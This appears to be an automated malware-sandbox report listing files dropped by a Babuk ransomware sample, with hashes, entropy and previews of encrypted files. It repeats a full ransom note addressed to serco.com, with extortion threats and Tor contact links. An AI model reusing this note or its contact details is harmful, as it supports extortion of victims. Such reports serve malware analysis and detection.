                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.673210280216431
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlXu44vLLXCOW25g90U9b7aG8fewO+ya2yDJv782I09UxNvEEn:nu44vLjCH25gVZZ8fef+yazJjxr90vtn
                                                                            MD5:FD0C0ED8B8D1591AE20B331170AF57AD
                                                                            SHA1:C075778CD919944147B57D2D5DDF439E4C95EAB7
                                                                            SHA-256:C9B849EF52B48509504C55AB3ABF2F01AB2AA0945E3F5F13E4A565C0E98AC054
                                                                            SHA-512:9F198EF7434B0BBD0A417433B0296FFDB6BEF1A6D6B6578F2D339E1A2EDDBDD47161A87DB10E498033D977BDE8312BABED2D91C7B5619E12CEFD94632A6F86D7
                                                                            Malicious:false
                                                                            Preview: .....r.lE.:]..L........%.!.v..z....7....`.W......`.`.Q{..{-.X...%.8..6R.-....3^...)T......Y7U4..[-F...w.c&..>ZO.h?.G....Z.....X$....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980059201619717
                                                                            Encrypted:false
                                                                            SSDEEP:192:wOcraisRinPPr8QSMJUzNlokkR51F+858SOSZ2AVAMMPa1XGHQbC:wOLisRsr0zjk1FjVOoOPZwbC
                                                                            MD5:5AB5C5AEE9C547050449BA4FF67D91B9
                                                                            SHA1:AE12A802A46A285BB5601E9F12C3DB0594840BA0
                                                                            SHA-256:94A6EFD711902C6C8D613CD05F61F8413A7947AD80D904FBBDE18661779A025C
                                                                            SHA-512:2A906B3F80409FD674D4D247491DD6004F2FD991ACDCFE09A438A727628E8E824BE1F0730FC1685007A03FC3C3B7FBBDFDEDFF5C17F3680A7E66B7068641C8C4
                                                                            Malicious:false
                                                                            Preview: ..Fef.%I..@.K....I|h..s..x5.]..<g.rl.w2.........#i0=..V<....<rG..Z...1cF.F.X.p;c.@2.C..dD.....@.|g..`......;V..BzC..s.F5.F...K...?.A.sg`..G..Xh........A.}...9*.bK.V.r&.J....>Y...2......Y'.|....ADx%......+........,...h.,..c..O..f.n...jq..7I..&....=|.....[.A+P5r...qe.b.....tU..A-iV?0.,?W5...H(...b.&...D:.............`.........4...C....\_.h.'.| .$z.A3.5k.o.....iq...+3.Gw1..(....h.9l...3%.V..z.~..?.O..zx.7...8KF;v$@.qO-).....>p...W^r?...hoe.[...z...O.5(Qt.4UN.-.#...-9....w..y.:i...#...\.e...Z...2.BYR..../._3..O..x..B......X.3z......:C../....._.6.=...(p6i.........m(.>../v.y...P.WN?_..G.[.=G......=.J...|?8sH.pl.Dt..`.=wv....G.bP.Y..F..k.T.\.i.."S.e..8_.!..1w@....jG./.'1.+(.{....>..hG.XIm.P...8..".$l...s.,.E.p...!....Y{.q.O...........-..h.eea./.[.?a.:........(...O.........U..5...3..R..$.?....`_.L...\.]....]..;...v... o.Bj...Gv.R..N.....P.4..[.$..U...u.....z.M......'N.<..Fl9...^.t..z..q.iQ.D8n.a..R.0-+.L.C..v.r.@._.......'..P.T\|.z..)(A7m...H..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
